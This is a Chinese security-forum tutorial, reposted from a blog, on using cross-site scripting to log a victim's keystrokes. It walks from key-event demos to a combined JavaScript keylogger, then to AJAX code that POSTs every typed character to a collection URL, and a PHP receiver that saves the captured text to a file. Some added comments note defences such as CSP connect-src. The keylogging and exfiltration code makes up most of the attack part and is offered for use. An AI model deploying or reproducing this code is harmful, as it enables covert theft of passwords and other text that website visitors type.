XSS 高级技巧:劫持键盘

XSS 又叫 CSS (Cross Site Script),跨站脚本攻击。它指的是恶意攻击者往 Web 页面里插入恶意 HTML 代码,当用户浏览该页之时,嵌入其中的 HTML 代码会被执行,从而达到恶意攻击用户的特殊目的。XSS 属于被动式的攻击,因为其被动且不好利用,所以许多人常忽略其危害性。这里是我们自己的交流平台,是属于我们 90sec 所有成员的技术分享平台!今天就来说说这个劫持键盘是怎么实现的。JS 里面最主要的就是这几个按键事件:
onkeydown                         当用户按下键盘按键时触发。
onkeypress                        当用户按下字符键时触发。
onkeyup                           当用户释放键盘按键时触发。

onkeydown 和 onkeyup 获取的都是大写的,几乎所有的字符都可以获取。
onkeypress 获取的是小写,一些字符(例如退格等)获取不了;但是像 shift+1 这样的字符它是直接获取 "!",不像 onkeydown、onkeyup 都是获取两个字符。`document.onkeydown = keydown;` 像这样子,随便在键盘上按一个键都会触发这个函数,其他的也是一样。我们还需要考虑一下浏览器:不同的浏览器获取的事件对象是不一样的。
IE 的话我们用 event.keyCode;像火狐的就要
加一个参数,然后用事件对象的 which 属性:
function keydown(x){

// The event object arrives as the parameter x (the non-IE convention) and
// its `which` property carries the key code.
2 var keycode=x.which;
3 }
// NOTE(review): JavaScript identifiers are case-sensitive, so `Document` is
// not the global document object; this line should read
// `document.onkeydown=keydown;`.
4 Document.onkeydown=keydown;
因为获取的都是键码 (keyCode),所以还需要用 String.fromCharCode 进行转换。
下面是 IE 的三个键盘事件的代码:
<HTML>

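<HEAD><TITLE>onkeypress</TITLE>
</HEAD>
<BODY>
<script type="text/javascript">
        // Demo: show the character and the key code of every keypress on the page.
        var aaa = "";   // characters typed so far
        var bbb = "";   // key codes, concatenated as decimal digits (no separator)
        function onkeypress(e) {
            // IE only exposes window.event; other browsers pass the event as an
            // argument, and on keypress Firefox reports the character in `which`.
            var evt = e || window.event;
            var keycode = evt.which || evt.keyCode;
            var realkey = String.fromCharCode(keycode);
            aaa += realkey;
            bbb += keycode;
            // Typed text is data, not markup: write it with textContent
            // (innerText on IE < 9), never innerHTML.
            document.getElementById("sb").textContent = aaa;
            document.getElementById("eb").textContent = bbb;
        }
        document.onkeypress = onkeypress;
</script>
<div id="sb"></div>
<hr>
<div id="eb"></div>
</BODY>
</HTML>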
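<HTML>
<HEAD><TITLE>keydown</TITLE>
</HEAD>
<BODY>
<script type="text/javascript">
        // Demo: show the key code of every keydown and the character it maps to.
        var aaa = "";   // String.fromCharCode() of each key code (letters come out uppercase)
        var bbb = "";   // key codes, concatenated as decimal digits (no separator)
        function keydown(e) {
            // IE only exposes window.event; other browsers pass the event as an argument.
            var evt = e || window.event;
            // On keydown this is a key code, not a character code, so fromCharCode
            // is only meaningful for letter and digit keys.
            var keycode = evt.which || evt.keyCode;
            var realkey = String.fromCharCode(keycode);
            aaa += realkey;
            bbb += keycode;
            // Typed text is data, not markup: write it with textContent
            // (innerText on IE < 9), never innerHTML.
            document.getElementById("sb").textContent = aaa;
            document.getElementById("eb").textContent = bbb;
        }
        document.onkeydown = keydown;
</script>
<div id="sb"></div>
<hr>
<div id="eb"></div>
</BODY>
</HTML>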
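<HTML>
<HEAD><TITLE>keyup</TITLE>
</HEAD>
<BODY>
<script type="text/javascript">
        // Demo: show the key code of every keyup and the character it maps to.
        var aaa = "";   // String.fromCharCode() of each key code (letters come out uppercase)
        var bbb = "";   // key codes, concatenated as decimal digits (no separator)
        function keyup(e) {
            // IE only exposes window.event; other browsers pass the event as an argument.
            var evt = e || window.event;
            // On keyup this is a key code, not a character code, so fromCharCode
            // is only meaningful for letter and digit keys.
            var keycode = evt.which || evt.keyCode;
            var realkey = String.fromCharCode(keycode);
            aaa += realkey;
            bbb += keycode;
            // Typed text is data, not markup: write it with textContent
            // (innerText on IE < 9), never innerHTML.
            document.getElementById("sb").textContent = aaa;
            document.getElementById("eb").textContent = bbb;
        }
        document.onkeyup = keyup;
</script>
<div id="sb"></div>
<hr>
<div id="eb"></div>
</BODY>
</HTML>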
根据它们的不同,相互互补完成了这样一个脚本,能看懂的就看一下吧。功能差不多都归功于 onkeypress,onkeypress 获取不到的都用 keydown 来获取:
<HTML>

02 <HEAD><TITLE>js劫持键盘代码by Darkmoon</TITLE>
03
04 </HEAD>
05 <BODY>
<!-- Combined version of the three demos above: onkeypress contributes printable
     characters, onkeydown contributes names for control/navigation keys; both append
     to the same buffer bbb and render it into #xb. Written against IE's global
     `event` object (see the earlier note on Firefox, which passes the event as a
     parameter). The #eb div below is never written to in this version. -->
06 <script type=”text/javascript”>
07         var aaa=””;   // key codes, accumulated but never displayed (line 21 is commented out)
08         var bbb=””;   // the text rendered into #xb
09   function onkeypress() {
10        var keycode = event.keyCode;
11                 //var keyname=0;
12        //var realkey = String.fromCharCode(event.keyCode);
           // keyname is never declared with var, so it is an implicit global
           // shared with keydown() below.
13         switch(keycode){
           // Control keys yield "" here; keydown() supplies their names instead.
14         case 8: case 9:case 13:case 32:case 37:case 38:case 39:case 40:case 46:keyname=””;break;
15
           // unreachable: the case above already breaks
16         break;
17      default:keyname = String.fromCharCode(keycode);break;
18                 }
19                 aaa+=keycode;
20                 bbb+=keyname;
21 //document.getElementById(“sb”).innerHTML=aaa;
           // innerHTML treats the typed text as markup; textContent is the safer sink.
22 document.getElementById(“xb”).innerHTML=bbb;
23         }
24
25         function keydown(){
26          var keycode = event.keyCode;
           // Only key codes 8-13 and 32-46 are considered; everything else yields "".
27         if((keycode>7&&keycode<14)||(keycode>31&&keycode<47)){
28         switch(keycode){
29              case 8: keyname = “[退格]”; break;
30           case 9: keyname = “[制表]”; break;
31           case 13:keyname = “[回车]”; break;
32           case 32:keyname = “[空格]”; break;
33           case 33:keyname = “[PageUp]”;   break;
34           case 34:keyname = “[PageDown]”;   break;
35           case 35:keyname = “[End]”;   break;
36           case 36:keyname = “[Home]”;   break;
37           case 37:keyname = “[方向键左]”;   break;
38           case 38:keyname = “[方向键上]”;   break;
39           case 39:keyname = “[方向键右]”;   break;
40           case 40:keyname = “[方向键下]”;   break;
41           case 46:keyname = “[删除]”;   break;
42           default:keyname = “”;break;
43                 }
44
45
46                 }else{
47
48                 keyname=””;
49                 }
50 bbb+=keyname;
           // Same innerHTML sink as in onkeypress(); textContent would be safer.
51 document.getElementById(“xb”).innerHTML=bbb;
52         }
53
           // Both handlers are registered document-wide.
54      document.onkeypress = onkeypress;
55          document.onkeydown = keydown;
56
57 </script>
58
59 <div id=”eb”></div>
60 <Hr>
61 <div id=”xb”></div>
62 </BODY>
63 </HTML>
上面是综合写的一个脚本。
如图:

那么 XSS 呢?说到 XSS 就不能不说 AJAX 技术,XSS 的利用很大程度上归功于 AJAX。鉴于本文不是基础教程,不理解的话先看一下资料,或者百度一下,或者找我以前做个视频教程。下面是花了一天时间写的:
02                 var request=false;

03

04                 //window对象中有XMLHttpRequest存在就是非IE,包括(IE7,IE8)

05                 if(window.XMLHttpRequest){

06                         request=new XMLHttpRequest();

07

08                         if(request.overrideMimeType){

09                                 request.overrideMimeType(“text/xml”);

10                         }

11

12

13                 //window对象中有ActiveXObject属性存在就是IE

14                 }else if(window.ActiveXObject){

15

16                         var versions=[‘Microsoft.XMLHTTP’, ‘MSXML.XMLHTTP’, ‘Msxml2.XMLHTTP.7.0′,’Msxml2.XMLHTTP.6.0′,’Msxml2.XMLHTTP.5.0’, ‘Msxml2.XMLHTTP.4.0’, ‘MSXML2.XMLHTTP.3.0’, ‘MSXML2.XMLHTTP’];

17

18                         for(var i=0; i<versions.length; i++){

19                                         try{

20                                                 request=new ActiveXObject(versions[i]);

21

22                                                 if(request){

23                                                         return request;

24                                                 }

25                                         }catch(e){

26                                                 request=false;

27                                         }

28                         }

29                 }

30                 return request;

31         }

32

33 //注意: 要每次请求都要使用一个新的XMLHttpRequest

34 /*

35         如果使用get将数据传给服务器,则服务器就使用$_GET

36         就直接通过Url将数据传给服务器

37

38         使用POST时一定要使用        ajax.setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”);

39

40

41   */

// XHR handle used by show(); a new object is created on every call.
42 var ajax=null;
// Keystroke buffer, pre-filled with the form field name so that the whole
// string can be sent as an application/x-www-form-urlencoded body.
43 var xl=”username=”;

44

45

46

47

48

// Keypress handler: appends the typed character to the buffer xl and calls
// show() right away, i.e. one network request per key. Relies on IE's global
// `event` object (see the earlier note on Firefox).
49 function onkeypress() {
50
51
52        var realkey = String.fromCharCode(event.keyCode);
53             xl+=realkey;
54                 show();
55         }

56

// Document-wide registration: the handler fires for every keypress on the page.
57 document.onkeypress = onkeypress;

58

// Called on every keypress: obtains a fresh XMLHttpRequest from createAjax()
// (defined earlier in the file; its opening line is missing from this listing)
// and POSTs the whole accumulated buffer xl to a hard-coded URL. The response
// body is read but discarded; a non-200 status pops an alert.
59 function show(){
60
61         ajax=createAjax();
62         ajax.onreadystatechange=function(){
63
64                 if(ajax.readyState==4){
65                         if(ajax.status==200){
66                                 var data=ajax.responseText;
67
68                                 //alert(data);
69
70                         }else{
71                                 alert(“页面请求失败”);
72                         }
73                 }
74         }
75         //document.onkeypress = onkeypress;
76         var postdate = xl;
           // Defender's note: the browser sends this request even when the
           // destination is another origin (the same-origin policy only hides the
           // response). A Content-Security-Policy `connect-src` directive restricts
           // where XHR may connect, and one POST per keystroke to a fixed endpoint
           // is an easy pattern to spot in proxy or network logs.
77         ajax.open(“POST”, “http://127.0.0.1/yans/post.php“, true);
78         ajax.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);
79         ajax.setRequestHeader(“Content-length”, postdate.length);
80         ajax.setRequestHeader(“Connection”, “close”);
81         ajax.send(postdate);
82
83
84
85         //ajax.send(null);
86
87         //by darkmoon link:90sec.org blog:blog.moonhack.com
88
89 }
还有接收的 PHP 脚本。只要调用一下 JS 文件,XSS 劫持键盘就能够实现!
<?php

2 //if($_POST[‘bbb’]){
// Receiver for the buffer posted by show(): the `username` field is written,
// without any validation or authentication, to the relative file fuck.txt.
3 $a=$_POST[‘username’];
4 $handle=fopen(‘fuck.txt’,”w”);
5 fwrite($handle,$a.”rn”);
6 //}
7
8 ?>

转自落泪红尘博客,由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。